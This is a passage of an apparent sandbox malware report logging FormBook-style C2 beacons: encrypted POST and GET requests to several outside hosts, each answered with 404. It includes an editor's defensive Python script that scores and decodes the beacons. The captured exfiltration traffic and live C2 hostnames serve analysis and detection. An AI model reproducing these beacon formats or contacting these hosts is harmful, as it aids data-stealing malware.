                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>
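Sessions 9 to 12 above are the same beacon shape four times: a short single-directory path (/d8cw/), a fixed Mac Chrome 42 User-Agent, Origin and Referer pointing back at the request's own URL, a body declared as application/x-www-form-urlencoded that actually carries one two-character parameter (gP) holding raw base64 with unescaped "+", "/" and "=", and a GET variant that adds a second parameter named "-L". The following triage script is an added example by the editor, not part of the Joe Sandbox report or a Suricata rule: it reconstructs the session 9 POST and session 12 GET from the headers and bodies shown above, scores each against those traits, and decodes the payload without the URL-decoding mistake that would corrupt it. Function and trait names are the editor's assumptions.

```python
"""Triage the HTTP beacons in sessions 9 to 12 above.

Added example by the editor, not part of the Joe Sandbox report. The two
requests are constructed from sessions 9 (POST) and 12 (GET) with headers and
bodies copied verbatim; the trait checks are the editor's own heuristics, not
a Joe Sandbox or Suricata signature, and the names below are assumptions.
"""
from __future__ import annotations

import base64
import binascii
import re
from urllib.parse import urlsplit

# User-Agent hard-coded by this sample; identical in every session above.
UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36")

# Constructed sample input: session 9 as it appears on the wire (CRLF line ends).
SESSION_9_POST = "\r\n".join([
    "POST /d8cw/ HTTP/1.1",
    "Host: www.zenscape.top",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language: en-US",
    "Accept-Encoding: gzip, deflate, br",
    "Content-Type: application/x-www-form-urlencoded",
    "Cache-Control: no-cache",
    "Connection: close",
    "Content-Length: 199",
    "Origin: http://www.zenscape.top",
    "Referer: http://www.zenscape.top/d8cw/",
    "User-Agent: " + UA,
    "",
    "gP=/itW34sb01LlH8lgG1BjcCJ/03yRHz7I7GEjkO/2+KN9Gzhq1Ado09VBqVb8Tsegac"
    "WTTrRstxOnMkXC3iYrplqJyqqiuex+lD0WATH1R3bpXJ9WXPdjegDfnM3P6InHAECobzhp"
    "UsHnugXkTPI6zDzRP+jdhF/80I8N3cQoFU0Twoa3zBWMhA1fY3xBnz/Hnw==",
])

# Constructed sample input: session 12, the GET variant with a second "-L" parameter.
SESSION_12_GET = "\r\n".join([
    "GET /d8cw/?gP=ygF20N1+ik7kBOtBXXgSSDl+0mvoPS6R8XEst5j0lvkfFXMCnxh1w4hdkVa8"
    "euGiR7K2W9wNoXO2NDH8py5otm2v66eMoudDkD1QDiauZF6PALhNXvt3BHI=&-L=kBMxZFRpAD6P HTTP/1.1",
    "Host: www.zenscape.top",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language: en-US",
    "Connection: close",
    "User-Agent: " + UA,
    "", "",
])

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def split_params(query: str) -> list[tuple[str, str]]:
    """name=value pairs WITHOUT percent/plus decoding. The beacon ships raw base64
    in a body it labels form-encoded, so urllib's parse_qs would turn every '+'
    into a space and corrupt the payload."""
    pairs = []
    for item in query.split("&"):
        if item:
            name, _, value = item.partition("=")
            pairs.append((name, value))
    return pairs


def beacon_params(req: dict) -> list[tuple[str, str]]:
    """POST carries the parameters in the body, GET in the query string."""
    source = req["body"] if req["method"] == "POST" else urlsplit(req["target"]).query
    return split_params(source)


def assess(raw: str) -> dict:
    """Score one request against the traits shared by every beacon in this report."""
    req = parse_request(raw)
    h = req["headers"]
    path = urlsplit(req["target"]).path
    params = beacon_params(req)
    name, value = params[0] if params else ("", "")
    traits = {
        # single short directory with trailing slash: /d8cw/ and /jsqu/ above
        "short_path": re.fullmatch(r"/[a-z0-9]{3,8}/", path) is not None,
        "static_ua": h.get("user-agent") == UA,
        "two_char_param": len(name) == 2,
        "base64_payload": B64_RE.fullmatch(value) is not None and len(value) % 4 == 0,
        # Origin/Referer point back at the request's own host and path
        "self_referer": h.get("referer") == f"http://{h.get('host')}{path}",
        # body claims form encoding but carries unescaped + / = characters
        "unescaped_form_body": (req["method"] == "POST"
                                and h.get("content-type") == "application/x-www-form-urlencoded"
                                and any(c in value for c in "+/=")),
        # GET variant adds a second parameter whose name starts with '-'
        "dash_param": any(n.startswith("-") for n, _ in params[1:]),
    }
    try:
        decoded_len = len(base64.b64decode(value, validate=True))
    except binascii.Error:
        decoded_len = None
    declared = h.get("content-length")
    return {"method": req["method"], "host": h.get("host"), "path": path,
            "traits": traits, "score": sum(traits.values()),
            "payload_chars": len(value), "decoded_bytes": decoded_len,
            "length_consistent": declared is None or int(declared) == len(req["body"])}


if __name__ == "__main__":
    for sample in (SESSION_9_POST, SESSION_12_GET):
        r = assess(sample)
        print(r["method"], r["host"], r["path"], "score", r["score"],
              "payload", r["payload_chars"], "chars ->", r["decoded_bytes"], "bytes")
```

The 199-byte body of session 9 is "gP=" plus 196 base64 characters (145 bytes once decoded), which matches its Content-Length; the GET of session 12 carries 120 characters (89 bytes). Two caveats for anyone turning this into a detection: the payload is encrypted, so nothing here decodes its contents, and the run of 404 responses is not evidence of a dead C2. The same PID 3000 moves on to www.asociacia.online in session 13 with an identical request shape, and FormBook's domain list mixes decoys with the live server, so every host it beacons to deserves the same scrutiny.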


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.11 | 49994 | 81.2.196.19 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:53.053775072 CEST | 736 | OUT | POST /jsqu/ HTTP/1.1
                                                                                                      Host: www.asociacia.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.asociacia.online
                                                                                                      Referer: http://www.asociacia.online/jsqu/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 67 6a 38 6d 38 35 68 4d 76 4d 6d 47 7a 30 7a 4e 57 77 56 46 6c 77 33 48 47 30 45 53 6e 47 69 72 44 56 63 61 4e 5a 77 47 4c 4f 71 74 56 6c 63 56 44 70 35 79 52 48 7a 2b 2b 63 2f 37 51 73 4e 64 56 73 35 6d 49 4c 66 6c 4c 58 53 59 5a 59 48 41 62 45 68 6e 72 56 59 66 4d 55 74 49 49 44 77 7a 63 4f 31 49 6e 4e 48 72 6c 66 4b 38 34 39 61 39 49 34 39 68 4b 39 2f 78 39 61 55 6e 30 49 46 66 48 4d 72 37 67 2f 30 56 42 30 6d 76 61 50 5a 76 75 4c 4f 53 42 36 4c 6a 35 36 63 33 61 53 72 36 79 52 44 75 52 42 52 38 6a 4e 75 6e 47 59 75 4e 49 66 7a 65 6c 41 3d 3d
                                                                                                      Data Ascii: gP=u4hmZftlXCx4gj8m85hMvMmGz0zNWwVFlw3HG0ESnGirDVcaNZwGLOqtVlcVDp5yRHz++c/7QsNdVs5mILflLXSYZYHAbEhnrVYfMUtIIDwzcO1InNHrlfK849a9I49hK9/x9aUn0IFfHMr7g/0VB0mvaPZvuLOSB6Lj56c3aSr6yRDuRBR8jNunGYuNIfzelA==
Oct 8, 2024 15:55:53.696913004 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:55:53 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.11 | 49995 | 81.2.196.19 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:55.602183104 CEST | 756 | OUT | POST /jsqu/ HTTP/1.1
                                                                                                      Host: www.asociacia.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.asociacia.online
                                                                                                      Referer: http://www.asociacia.online/jsqu/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 75 34 68 6d 5a 66 74 6c 58 43 78 34 68 43 73 6d 7a 2b 4e 4d 6b 4d 6d 46 32 30 7a 4e 59 51 55 4d 6c 77 37 48 47 31 42 50 79 67 36 72 41 30 73 61 63 6f 77 47 59 2b 71 74 4e 56 63 51 4d 4a 35 35 52 48 50 4d 2b 64 54 37 51 74 70 64 56 70 56 6d 49 34 33 6b 5a 33 53 65 55 34 48 43 55 6b 68 6e 72 56 59 66 4d 55 49 6e 49 48 55 7a 64 2b 46 49 6e 76 76 73 37 50 4b 39 39 39 61 39 5a 6f 39 74 4b 39 2f 48 39 61 6c 4d 30 4f 42 66 48 4a 76 37 67 71 59 57 59 45 6d 74 46 66 59 36 6c 2b 72 72 49 34 53 7a 34 6f 55 44 54 67 76 70 7a 58 53 30 42 69 59 72 67 65 6d 6c 53 2b 50 39 42 75 57 58 2b 4e 69 7a 39 6b 4f 71 55 35 72 77 71 58 45 36 77 75 61 48 74 33 77 3d
                                                                                                      Data Ascii: gP=u4hmZftlXCx4hCsmz+NMkMmF20zNYQUMlw7HG1BPyg6rA0sacowGY+qtNVcQMJ55RHPM+dT7QtpdVpVmI43kZ3SeU4HCUkhnrVYfMUInIHUzd+FInvvs7PK999a9Zo9tK9/H9alM0OBfHJv7gqYWYEmtFfY6l+rrI4Sz4oUDTgvpzXS0BiYrgemlS+P9BuWX+Niz9kOqU5rwqXE6wuaHt3w=
Oct 8, 2024 15:55:56.264822960 CEST | 355 | IN | HTTP/1.1 404 Not Found
                                                                                                      Server: nginx
                                                                                                      Date: Tue, 08 Oct 2024 13:55:56 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.11 | 49996 | 81.2.196.19 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:55:58.290016890 CEST | 1769 | OUT | POST /jsqu/ HTTP/1.1
Host: www.asociacia.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 1231
Origin: http://www.asociacia.online
Referer: http://www.asociacia.online/jsqu/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:55:58.941078901 CEST | 355 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:55:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.11 | 49997 | 81.2.196.19 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:56:00.831670046 CEST | 464 | OUT | GET /jsqu/?-L=kBMxZFRpAD6P&gP=j6JGavFFAQYaoSsk3MdZismLyTuecDBS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuAECuXdbdVwd/lx4BGGAWHgBLP9AhssTD5eI= HTTP/1.1
Host: www.asociacia.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:56:01.492780924 CEST | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:56:01 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.11 | 49998 | 107.163.130.249 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:56:06.935695887 CEST | 715 | OUT | POST /jyeu/ HTTP/1.1
Host: www.93187.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 199
Origin: http://www.93187.xyz
Referer: http://www.93187.xyz/jyeu/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Ascii: gP=Hgj1voa8347XwoZCwbv8WG00xT1Fc9T8OuuIlnDzW7wCjFHdvbjUcr484ckfqCFAgpJy1+nQBY4ChY25Zxsw5xrGrxnYsi7RpHAfCK1ajT6uQ67kUWa+UHEAVq+kR/G86/ZVpnmMJgMoyFOg84zqYF9nLrZ1b2Q962o3L/oXZDlrjjuuQhfkHp421YuoBPijkw==
Oct 8, 2024 15:56:07.827970028 CEST | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:56:07 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66c48d46-94"
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.11 | 49999 | 107.163.130.249 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:56:09.481554985 CEST | 735 | OUT | POST /jyeu/ HTTP/1.1
Host: www.93187.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 219
Origin: http://www.93187.xyz
Referer: http://www.93187.xyz/jyeu/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Ascii: gP=Hgj1voa8347XzIpCy6v8Qm0zvD1FTdTCOuiIli7jWIECjl3duajUbr48z8kgpyFbgpNQ17fQBYsChcy5ZBQx5hrEiRnaoi7RpHAfCLQHjTiuRLLkbT29ZnEDcK+kGPG46/Z8pjmiJmAoyE+g8pzrNV9hPrYLTGtE7Wh2C+MnYQpaml/0ACWzE6w0h+PYI+Hq/+n2iN0dFf3HDjjYy7ACNps=
Oct 8, 2024 15:56:10.342489958 CEST | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:56:10 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66c48d46-94"
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.11 | 50000 | 107.163.130.249 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:56:12.028846025 CEST | 1748 | OUT | POST /jyeu/ HTTP/1.1
Host: www.93187.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 1231
Origin: http://www.93187.xyz
Referer: http://www.93187.xyz/jyeu/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:56:13.127681017 CEST | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:56:12 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66c48d46-94"
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.11 | 50001 | 107.163.130.249 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:56:14.563930035 CEST | 457 | OUT | GET /jyeu/?gP=KiLVsdjbhLGFnrJehKTzSS0IkzcAWv/LJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY3/QPGqQrPglnah1puMp4IzQunG6SYXgyDdEY=&-L=kBMxZFRpAD6P HTTP/1.1
Host: www.93187.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:56:15.481507063 CEST | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:56:15 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66c48d46-94"
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Oct 8, 2024 15:56:15.742499113 CEST | 312 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:56:15 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66c48d46-94"
                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.11 | 50002 | 103.21.221.4 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:56:29.495868921 CEST | 754 | OUT | POST /abla/ HTTP/1.1
Host: www.tempatmudisini01.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 199
Origin: http://www.tempatmudisini01.click
Referer: http://www.tempatmudisini01.click/abla/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:56:30.980561972 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Connection: close
x-powered-by: PHP/7.4.33
x-litespeed-tag: 894_HTTP.404
expires: Wed, 11 Jan 1984 05:00:00 GMT
content-type: text/html; charset=UTF-8
link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
x-litespeed-cache-control: no-cache
cache-control: no-cache, no-store, must-revalidate, max-age=0
transfer-encoding: chunked
content-encoding: br
vary: Accept-Encoding
date: Tue, 08 Oct 2024 13:56:30 GMT
server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.11 | 50003 | 103.21.221.48 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:56:32.044717073 CEST | 774 | OUT | POST /abla/ HTTP/1.1
Host: www.tempatmudisini01.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 219
Origin: http://www.tempatmudisini01.click
Referer: http://www.tempatmudisini01.click/abla/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:56:33.258434057 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Connection: close
x-powered-by: PHP/7.4.33
x-litespeed-tag: 894_HTTP.404
expires: Wed, 11 Jan 1984 05:00:00 GMT
content-type: text/html; charset=UTF-8
link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
x-litespeed-cache-control: no-cache
cache-control: no-cache, no-store, must-revalidate, max-age=0
transfer-encoding: chunked
content-encoding: br
vary: Accept-Encoding
date: Tue, 08 Oct 2024 13:56:33 GMT
server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.11 | 50004 | 103.21.221.48 | 80 | 3000 | C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:56:34.583652020 CEST | 1787 | OUT | POST /abla/ HTTP/1.1
Host: www.tempatmudisini01.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 1231
Origin: http://www.tempatmudisini01.click
Referer: http://www.tempatmudisini01.click/abla/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Oct 8, 2024 15:56:35.789258957 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Connection: close
x-powered-by: PHP/7.4.33
x-litespeed-tag: 894_HTTP.404
expires: Wed, 11 Jan 1984 05:00:00 GMT
content-type: text/html; charset=UTF-8
link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
x-litespeed-cache-control: no-cache
cache-control: no-cache, no-store, must-revalidate, max-age=0
transfer-encoding: chunked
content-encoding: br
vary: Accept-Encoding
date: Tue, 08 Oct 2024 13:56:35 GMT
server: LiteSpeed
